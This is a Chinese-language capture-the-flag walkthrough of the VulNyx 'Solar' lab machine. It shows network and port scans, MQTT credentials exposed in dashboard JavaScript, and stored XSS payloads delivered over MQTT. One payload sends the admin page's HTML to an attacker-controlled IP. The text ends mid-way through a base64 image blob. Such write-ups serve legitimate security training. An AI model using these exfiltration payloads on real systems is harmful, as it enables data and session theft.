VulNyx Solar靶机复盘
难度-Hard
VulNyx Solar靶机复盘
网段扫描
1
2
3
4
5
6
7
8
9
10
11
root@LingMj:/home/lingmj# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:df:e2:a7, IPv4: 192.168.56.110
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:12 (Unknown: locally administered)
192.168.56.100 08:00:27:5b:72:b4 (Unknown)
192.168.56.159 08:00:27:33:69:92 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.849 seconds (138.45 hosts/sec). 3 responded
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@LingMj:/home/lingmj# nmap -p- -sC -sV 192.168.56.159
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-20 22:27 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.159
Host is up (0.0036s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 00:31:c1:0a:8b:0f:c9:45:e7:2f:7f:06:0c:4f:cb:42 (ECDSA)
|_ 256 6b:04:c5:5d:39:ed:b3:41:d0:23:2b:77:d1:53:d0:48 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.62 ((Debian))
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.62 (Debian)
|_ssl-date: TLS randomness does not represent time
|_http-title: Solar Energy Control Login
| ssl-cert: Subject: commonName=www.solar.nyx/organizationName=Solar/stateOrProvinceName=Madrid/countryName=ES
| Subject Alternative Name: DNS:www.solar.nyx, DNS:www.sunfriends.nyx
| Not valid before: 2024-10-10T00:03:30
|_Not valid after: 2034-10-08T00:03:30
MAC Address: 08:00:27:33:69:92 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.06 seconds
获取webshell
爆破么?不过可以先看443端口
没有直接的443,好像就是一个简单的域名而已,先保留想法继续往下做了
先爆破用户名一手
这爆破我也不知道咋整啊,记得一个用户是管理员用户的名字试一下,在昨天的love靶机里同一个作者应该会有一些设计同点
看到了但是没用现在完全不知道用户名
cookie啥也没有可以考虑上面msg的地方拼接什么或者扫域名了
能说不在80这但是网页也没有指向443的地方有点复杂了
可以控制就看看能带出什么信息了
貌似我写的不规范,我记得之前做xss的有一个直接找ping的看看有没有这个被执行不回显
无在看看那里能进行测试了
好了我的路好像死了,我去扒拉扒拉聊天记录了,感觉没想法了,没有有用的前面被秒了我看看域名先吧
投降看一下wp,看看哪里有问题
我以为一直不能扫呢,服了没事又学一招
打了半天入口都没找到头疼
可以看到很多用户名
处理一下拿一下用户出来
有点丑陋将就看吧
可以挨个利用了目前来看没用其他利用的信息了
只有一个存在别的回显应该是登录了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
import mqtt from '/mqtt.js'
let userName = "calvin";
let userRole = "user";
var mqttclient = mqtt.connect('wss://www.solar.nyx/wss/', {
clientId: userName + '-dashboard-' + new Date().valueOf(),
username: 'user',
password: '1tEa15klQpTx9Oub6ENG',
protocolId: 'MQTT'
});
mqttclient.on("message", getMessagesStatus);
function getMessagesStatus(msTopic, msBody) {
let data = JSON.parse(msBody.toString());
setParams(data.solarEnergy, data.consumedEnergy);
}
mqttclient.subscribe("data", function (err) {
if (err) {
console.log('ERROR MQTT', err.toString());
mqttclient.end();
}
});
let solar = 0, consumed = 0, grid = 0;
// Initialize the bar chart using Chart.js
const ctx = document.getElementById('energyChart').getContext('2d');
let energyChart = new Chart(ctx, {
type: 'bar',
data: {
labels: ['Solar', 'Consumed', 'Grid'],
datasets: [{
label: 'Energy (kWh)',
data: [solar, consumed, grid],
backgroundColor: ['#6fcf97', '#eb5757', '#56ccf2'],
}]
},
options: {
scales: {
y: {
beginAtZero: true,
ticks: {
callback: function (value) { return value + " kWh"; }
}
}
},
plugins: {
legend: {
display: false
},
tooltip: {
callbacks: {
label: function (context) {
return context.dataset.label + ': ' + context.raw + ' kWh';
}
}
}
}
}
});
// Update the chart and labels with new data
function setParams(solarEnergy, consumedEnergy) {
let gridEnergy = consumedEnergy - solarEnergy;
solar = solarEnergy;
consumed = consumedEnergy;
grid = gridEnergy;
// Update the bar chart
energyChart.data.datasets[0].data = [solar, consumed, grid];
energyChart.update();
// Update labels with specific colors
document.getElementById('solarEnergyLabel').innerHTML = `<span class="energy-value solar">${solarEnergy} kWh</span>`;
document.getElementById('consumedEnergyLabel').innerHTML = `<span class="energy-value consumed">${consumedEnergy} kWh</span>`;
let gridLabel = document.getElementById('gridEnergyLabel');
gridLabel.innerHTML = `<span class="energy-value ${gridEnergy < 0 ? 'grid-negative' : 'grid-positive'}">${gridEnergy} kWh</span>`;
document.getElementById('userInfo').innerHTML = `<span>${userName}</span><br>${userRole}`;
}
setParams(0, 0);
上面的密码没一个可以登录这边这个,信息的话就用户身份密码还有一个MQTT,一个js
又是消息传递,但是不懂咋构造,查了百度告诉我要下载个客户端把域名啥的套进去,我先看看是这个路线不,地址:https://mqttx.app/downloads
没见连接成功应该是我的问题看看标准的连接形式把
正确的填写方法,错误一点都给你弹来弹去
可以控制现在就看看咋利用这个消息认证进行反弹shell了,记得之前的commands有东西
发这个东西无果,尝试xss了,这是我做这个靶机之前唯一知道的提示
xss对我来说难度有点大了
不想找了用一下wp的xss方案
1
2
"<img src=x onerror=eval(atob(\/[base64encodeJavascriptCode]\/.source)); />"
"<img src=x onerror=\"(async () => {location.href='http://192.168.56.110:8000?url='+encodeURIComponent(window.location.href)+'&code='+btoa(document.body.outerHTML);})();\"; />"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
<body>
<div class="dashboard">
<object class="solar-icon" data="sun.svg" type="image/svg+xml" style="width:75px;"></object>
<h1>Solar Energy Dashboard</h1>
<div class="user-info" id="userInfo"><span>JulianAdm</span><br>admin</div>
<canvas id="energyChart" class="energy-chart" width="400" height="200" style="display: block; box-sizing: border-box; height: 200px; width: 400px;"></canvas>
<div class="energy-label"><span class="solar-title">Solar:</span> <span id="solarEnergyLabel" class="energy-value solar"><span class="energy-value solar"><img src="x" onerror="(async () => {location.href='http://192.168.56.110:8000?url='+encodeURIComponent(window.location.href)+'&code='+btoa(document.body.outerHTML);})();" ;=""> kWh</span></span></div>
<div class="energy-label"><span class="consumed-title">Consumed:</span> <span id="consumedEnergyLabel" class="energy-value consumed"><span class="energy-value consumed">187 kWh</span></span></div>
<div class="energy-label"><span class="grid-title">Grid:</span> <span id="gridEnergyLabel" class="energy-value grid-positive"><span class="energy-value grid-positive">NaN kWh</span></span></div>
<a href="/logout.php" class="logout-link" id="logoutLink">Logout</a>
<a href="/records/" class="logout-link">Records</a>
<a href="#" class="logout-link" id="send-record-id">Send record</a>
</div>
<!--<script src="/mqtt.min.js"></script>-->
<script src="/chart.js"></script>
<script type="module">
import mqtt from '/mqtt.js'
let userName = "JulianAdm";
let userRole = "admin";
var mqttclient = mqtt.connect('wss://www.solar.nyx/wss/', {
clientId: userName + '-dashboard-' + new Date().valueOf(),
username: 'admin',
password: 'tJH8HvwVwC57BR6CEyg5',
protocolId: 'MQTT'
});
mqttclient.on("message", getMessagesStatus);
function getMessagesStatus(msTopic, msBody) {
let data = JSON.parse(msBody.toString());
setParams(data.solarEnergy, data.consumedEnergy);
}
mqttclient.subscribe("data", function (err) {
if (err) {
console.log('ERROR MQTT', err.toString());
mqttclient.end();
}
});
let solar = 0, consumed = 0, grid = 0;
// Initialize the bar chart using Chart.js
const ctx = document.getElementById('energyChart').getContext('2d');
let energyChart = new Chart(ctx, {
type: 'bar',
data: {
labels: ['Solar', 'Consumed', 'Grid'],
datasets: [{
label: 'Energy (kWh)',
data: [solar, consumed, grid],
backgroundColor: ['#6fcf97', '#eb5757', '#56ccf2'],
}]
},
options: {
scales: {
y: {
beginAtZero: true,
ticks: {
callback: function (value) { return value + " kWh"; }
}
}
},
plugins: {
legend: {
display: false
},
tooltip: {
callbacks: {
label: function (context) {
return context.dataset.label + ': ' + context.raw + ' kWh';
}
}
}
}
}
});
// Update the chart and labels with new data
function setParams(solarEnergy, consumedEnergy) {
let gridEnergy = consumedEnergy - solarEnergy;
solar = solarEnergy;
consumed = consumedEnergy;
grid = gridEnergy;
// Update the bar chart
energyChart.data.datasets[0].data = [solar, consumed, grid];
energyChart.update();
// Update labels with specific colors
document.getElementById('solarEnergyLabel').innerHTML = `<span class="energy-value solar">${solarEnergy} kWh</span>`;
document.getElementById('consumedEnergyLabel').innerHTML = `<span class="energy-value consumed">${consumedEnergy} kWh</span>`;
let gridLabel = document.getElementById('gridEnergyLabel');
gridLabel.innerHTML = `<span class="energy-value ${gridEnergy < 0 ? 'grid-negative' : 'grid-positive'}">${gridEnergy} kWh</span>`;
document.getElementById('userInfo').innerHTML = `<span>${userName}</span><br>${userRole}`;
}
setParams(0, 0);
// Show message
function showMessage(msg) {
const mensajeDiv = document.createElement('div');
mensajeDiv.classList.add("temp-message")
mensajeDiv.textContent = msg;
document.body.appendChild(mensajeDiv);
setTimeout(() => {
mensajeDiv.remove();
}, 3000);
}
// Function to send the record
function sendrecord() {
let btn = document.getElementById('send-record-id');
if (!btn.disabled) {
// Capture the chart as a base64 image
let chartImage = energyChart.toBase64Image();
mqttclient.publish('record', JSON.stringify({
time: new Date().toISOString(),
user: {
name: userName,
role: userRole
},
solar: solar,
consumed: consumed,
grid: grid,
chart: chartImage
}));
btn.disabled = true;
btn.style.opacity = '0.3';
setTimeout(() => {
btn.style.opacity = '1';
btn.disabled = false;
showMessage('Record was end successfully!')
}, 1500);
}
}
document.getElementById('send-record-id').onclick = sendrecord;
</script>
</body>
又来一个用户,我们可以添加一下,大体我试复现一下,差点给我干走了,所以现在基本图和代码留下来进行的复现操作,不bb了
1
2
"<img src=x onerror=\"document.querySelector(`#send-record-id`).dispatchEvent(new Event('click'));\" />"
1
{"time":"2025-02-21T21:34:50.574Z","user":{"name":"JulianAdm","role":"admin"},"solar":235,"consumed":132,"grid":-103,"chart":"data:image/png;base64,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